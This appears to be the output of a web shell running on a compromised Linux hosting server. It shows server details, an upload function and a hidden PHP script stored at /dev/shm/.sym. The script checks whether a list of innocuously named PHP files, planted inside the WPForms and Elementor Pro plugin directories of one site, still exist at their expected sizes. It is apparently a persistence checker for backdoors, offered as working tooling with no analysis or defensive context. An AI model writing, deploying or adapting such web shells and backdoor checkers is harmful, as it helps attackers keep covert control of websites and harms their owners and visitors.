SCHWEIS
Server: LiteSpeed
System: Linux premium103.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: aaasepid (956)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //dev/shm/.sym
<?php   $r = '/home/wisdsits/pakemb.hu'; $x = ["/wp-content/plugins/wpforms-lite/src/Integrations/ConstantContact/V3/Migration/album.php"=>"bd@@1020692@@965",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/apimatic/core/src/Request/Parameters/album_rate.php"=>"bd@@1015089@@862",
"/wp-content/plugins/wpforms-lite/src/Integrations/AI/Admin/Builder/faq_email_conf.php"=>"bd@@1034040@@957",
"/wp-content/plugins/elementor-pro/modules/forms/submissions/database/repositories/form.snapshot.repository.php"=>"bd@@1034047@@1051",
"/wp-content/plugins/elementor-pro/modules/forms/submissions/database/entities/form.snapshot.php"=>"bd@@1034057@@1077",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/ChildDef/data_modules_mcp.php"=>"bd@@1020513@@880",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/preform.php"=>"bd@@1014443@@818",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/AttrDef/URI/tags.php"=>"bd@@1020340@@842",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/apimatic/core-interfaces/src/Sdk/cust_report04.php"=>"bd@@1020876@@1013",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/Strategy/media_manager.php"=>"bd@@1014769@@928"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');